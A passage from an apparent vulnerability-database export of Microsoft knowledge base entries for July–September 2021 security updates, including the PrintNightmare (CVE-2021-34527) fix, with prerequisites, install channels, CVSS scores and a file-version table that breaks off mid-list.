Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5003636](<https://support.microsoft.com/help/5003636>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004959>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004959](<https://download.microsoft.com/download/b/1/7/b172b821-2078-46a7-9d3b-ad57b43bc04a/5004959.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004959 (Security-only update) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004959", "href": "https://support.microsoft.com/en-us/help/5004959", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:46", "description": "None\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5003636](<https://support.microsoft.com/help/5003636>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004958>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004958](<https://download.microsoft.com/download/e/e/8/ee826b51-4cff-4102-9abf-cabaab679169/5004958.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004958 (Security-only update) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004958", "href": "https://support.microsoft.com/en-us/help/5004958", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:39:02", "description": "None\n## **Summary**\n\nThis security update resolves vulnerabilities in Internet Explorer. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-us/security-guidance>).Additionally, see the following articles for more information about cumulative updates:\n\n * [Windows Server 2008 SP2 update history](<https://support.microsoft.com/help/4343218>)\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/help/4009469>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/help/4009471>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/help/4009470>)\n\n**Important: **\n\n * As of February 11, 2020, Internet Explorer 10 is no longer in support. To get Internet Explorer 11 for Windows Server 2012 or Windows 8 Embedded Standard, see [KB4492872](<https://support.microsoft.com/help/4492872>). Install one of the following applicable updates to stay updated with the latest security fixes:\n * Cumulative Update for Internet Explorer 11 for Windows Server 2012.\n * Cumulative Update for Internet Explorer 11 for Windows 8 Embedded Standard.\n * The September 2021 Monthly Rollup.\n * Some customers using Windows Server 2008 R2 SP1 who activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU>) post.\n * WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your update management and compliance toolsets.\n\nThis article applies to the following: \n\n * Internet Explorer 11 on Windows Server 2012 R2\n * Internet Explorer 11 on Windows 8.1\n * Internet Explorer 11 on Windows Server 2012\n * Internet Explorer 11 on Windows Server 2008 R2 SP1\n * Internet Explorer 11 on Windows 7 SP1\n * Internet Explorer 9 on Windows Server 2008 SP2\n\n**Important: **\n\n * The fixes that are included in this update are also included in the September 2021 Security Monthly Quality Rollup. Installing either this update or the Security Monthly Quality Rollup installs the same fixes.\n * This update is not applicable for installation on a device on which the Security Monthly Quality Rollup from September 2021 (or a later month) is already installed. This is because that update contains all the same fixes that are included in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security update classifications for deployment, this update, the September 2021 Security Only Quality Update, and the September 2021 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>).\n\n## **Known issues in this security update**\n\nWe are currently not aware of any issues in this update.\n\n## **How to get and install this update**\n\n**Before installing this update**To install Windows 7 SP1, Windows Server 2008 R2 SP1, or Windows Server 2008 SP2 updates released on or after July 2019, you must have the following required updates installed. If you use Windows Update, these required updates will be offered automatically as needed.\n\n * Install the SHA-2 code signing support updates: \n \nFor Windows 7 SP1, Windows Server 2008 R2, and Windows Server 2008 SP2, you must have the SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) that is dated September 23, 2019 or a later SHA-2 update installed and then restart your device before you apply this update. For more information about SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>). \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)) that is dated March 12, 2019. After update [KB4490628](<https://support.microsoft.com/help/4490628>) is installed, we recommend that you install the July 13, 2021 SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>). \n \nFor Windows Server 2008 SP2, you must have installed the servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)) that is dated April 9, 2019. After update [KB4493730](<https://support.microsoft.com/help/4493730>) is installed, we recommend that you install the October 13, 2020 SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>).\n * Install the Extended Security Update (ESU): \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/en/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n \nFor Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, you must have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems and follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n * For Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>). \n \nFor Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services. \n \nFor Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.**Important **You must restart your device after you install these required updates.**Install this update**To install this update, use one of the following release channels.**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other following options. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005563>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2, Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Server 2012, Windows Embedded 8 Standard, Windows 8.1, Windows Server 2012 R2**Classification**: Security Updates \n \n## **File information**\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.**Note** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n### **Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:32| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:19| 1,342,976 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:30| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 230,912 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:46| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 